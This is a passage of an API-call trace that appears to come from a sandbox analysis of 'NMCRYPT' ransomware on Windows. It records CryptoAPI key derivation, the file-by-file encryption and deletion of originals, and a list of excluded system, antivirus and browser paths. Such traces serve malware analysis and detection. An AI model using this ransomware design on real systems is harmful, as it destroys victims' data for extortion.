(in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.360] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.361] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.361] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0146.361] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0146.361] CryptCreateHash (in: hProv=0x8e2de0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4449d4 | out: phHash=0x1d4449d4) returned 1 [0146.361] CryptHashData (hHash=0x9ad5b8, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0146.361] CryptDeriveKey (in: hProv=0x8e2de0, Algid=0x6610, hBaseData=0x9ad5b8, dwFlags=0x4, phKey=0x1d4449d8 | out: phKey=0x1d4449d8*=0x9ad1b8) returned 1 [0146.361] CryptSetKeyParam (hKey=0x9ad1b8, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0146.361] CryptSetKeyParam (hKey=0x9ad1b8, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0146.361] wcslen (_String="\\\\?\\") returned 0x4 [0146.361] CryptDuplicateKey (in: hKey=0x9ad1b8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad2b8) returned 1 [0146.361] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsel.xml.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsel.xml.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0146.362] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsel.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsel.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0146.423] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=2618) returned 1 [0146.423] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0146.423] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0146.424] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0146.424] GetLastError () returned 0x0 [0146.424] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0146.463] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0146.464] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0146.464] GetLastError () returned 0x0 [0146.464] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0146.464] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0146.464] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0146.464] GetLastError () returned 0x0 [0146.464] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0146.464] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0146.464] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0146.464] GetLastError () returned 0x0 [0146.464] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0146.464] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0146.464] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0146.464] GetLastError () returned 0x0 [0146.464] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0146.464] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0146.464] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0146.464] GetLastError () returned 0x0 [0146.464] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0146.464] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0146.464] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0146.465] GetLastError () returned 0x0 [0146.465] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0146.465] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0146.465] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0146.465] GetLastError () returned 0x0 [0146.465] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0146.465] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0146.465] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0146.465] GetLastError () returned 0x0 [0146.465] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0146.465] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0146.465] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0146.465] GetLastError () returned 0x0 [0146.465] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0146.465] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x3a, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x3a, lpOverlapped=0x0) returned 1 [0146.465] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x3a, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0x40) returned 1 [0146.465] GetLastError () returned 0x0 [0146.465] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x40, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0x40, lpOverlapped=0x0) returned 1 [0146.465] ReadFile (in: hFile=0x1624, lpBuffer=0x1d421460, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0146.465] WriteFile (in: hFile=0x588, lpBuffer=0x1d421460*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d421460*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0146.466] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsel.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsel.xml")) returned 0x20 [0146.466] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsel.xml", dwFileAttributes=0x20) returned 0 [0146.466] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsel.xml") returned 1 [0146.466] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsel.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsel.xml")) returned 0 [0146.466] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsel.xml" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsel.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsel.xml" [0146.466] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsel.xml" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink") returned 1 [0146.466] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXAF02.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxaf02.tmp")) returned 0xaf02 [0146.469] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsel.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsel.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXAF02.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxaf02.tmp"), dwFlags=0x1) returned 0 [0146.469] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\.xXAF02.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\.xxaf02.tmp")) returned 1 [0146.469] CryptDestroyKey (hKey=0x9ad2b8) returned 1 [0146.469] wcslen (_String="OK") returned 0x2 [0146.469] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0146.469] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0146.469] CryptDestroyKey (hKey=0x9ad1b8) returned 1 [0146.469] CryptDestroyHash (hHash=0x9ad5b8) returned 1 [0146.469] CryptReleaseContext (hProv=0x8e2de0, dwFlags=0x0) returned 1 [0146.469] FindNextFileW (in: hFindFile=0x8be838, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0146.469] PathMatchSpecW (pszFile="ipsen.xml", pszSpec="*NMCRYPT") returned 0 [0146.469] PathMatchSpecW (pszFile="ipsen.xml", pszSpec="*Recovers your files.html") returned 0 [0146.469] PathMatchSpecW (pszFile="ipsen.xml", pszSpec="*.exe") returned 0 [0146.470] PathMatchSpecW (pszFile="ipsen.xml", pszSpec="*.dll") returned 0 [0146.470] PathMatchSpecW (pszFile="ipsen.xml", pszSpec="*.lnk") returned 0 [0146.470] PathMatchSpecW (pszFile="ipsen.xml", pszSpec="*.bat") returned 0 [0146.470] PathMatchSpecW (pszFile="ipsen.xml", pszSpec="*.ini") returned 0 [0146.470] PathMatchSpecW (pszFile="ipsen.xml", pszSpec="*.msi") returned 0 [0146.470] PathMatchSpecW (pszFile="ipsen.xml", pszSpec="*.scf") returned 0 [0146.470] PathMatchSpecW (pszFile="ipsen.xml", pszSpec="*pagefile.sys*") returned 0 [0146.470] PathMatchSpecW (pszFile="ipsen.xml", pszSpec="*NTUSER.DAT*") returned 0 [0146.470] PathMatchSpecW (pszFile="ipsen.xml", pszSpec="*AppData*") returned 0 [0146.470] PathMatchSpecW (pszFile="ipsen.xml", pszSpec="*\\winrar\\*") returned 0 [0146.470] PathMatchSpecW (pszFile="ipsen.xml", pszSpec="*\\Internet Explorer\\*") returned 0 [0146.470] PathMatchSpecW (pszFile="ipsen.xml", pszSpec="*\\java\\*") returned 0 [0146.470] PathMatchSpecW (pszFile="ipsen.xml", pszSpec="*\\TeamViewer\\*") returned 0 [0146.470] PathMatchSpecW (pszFile="ipsen.xml", pszSpec="*\\windows\\*") returned 0 [0146.470] PathMatchSpecW (pszFile="ipsen.xml", pszSpec="*\\ESET\\*") returned 0 [0146.470] PathMatchSpecW (pszFile="ipsen.xml", pszSpec="*\\AVG\\*") returned 0 [0146.470] PathMatchSpecW (pszFile="ipsen.xml", pszSpec="*\\AVIRA\\*") returned 0 [0146.470] PathMatchSpecW (pszFile="ipsen.xml", pszSpec="*\\AVAST Software\\*") returned 0 [0146.470] PathMatchSpecW (pszFile="ipsen.xml", pszSpec="*Atheros*") returned 0 [0146.470] PathMatchSpecW (pszFile="ipsen.xml", pszSpec="*Realtek*") returned 0 [0146.470] PathMatchSpecW (pszFile="ipsen.xml", pszSpec="*bootmgr*") returned 0 [0146.470] PathMatchSpecW (pszFile="ipsen.xml", pszSpec="*boot*") returned 0 [0146.470] PathMatchSpecW (pszFile="ipsen.xml", pszSpec="*boot*") returned 0 [0146.470] PathMatchSpecW (pszFile="ipsen.xml", pszSpec="*CONFIG.SYS*") returned 0 [0146.470] PathMatchSpecW (pszFile="ipsen.xml", pszSpec="*IO.SYS*") returned 0 [0146.470] PathMatchSpecW (pszFile="ipsen.xml", pszSpec="*MSDOS.SYS*") returned 0 [0146.470] PathMatchSpecW (pszFile="ipsen.xml", pszSpec="*NTDETECT.COM*") returned 0 [0146.470] PathMatchSpecW (pszFile="ipsen.xml", pszSpec="*ntldr*") returned 0 [0146.470] PathMatchSpecW (pszFile="ipsen.xml", pszSpec="*chrome*") returned 0 [0146.470] PathMatchSpecW (pszFile="ipsen.xml", pszSpec="*opera*") returned 0 [0146.470] PathMatchSpecW (pszFile="ipsen.xml", pszSpec="*firefox*") returned 0 [0146.470] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsen.xml", pszSpec="*") returned 1 [0146.470] strlen (_Str="NMoreira") returned 0x8 [0146.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.470] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.471] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0146.471] 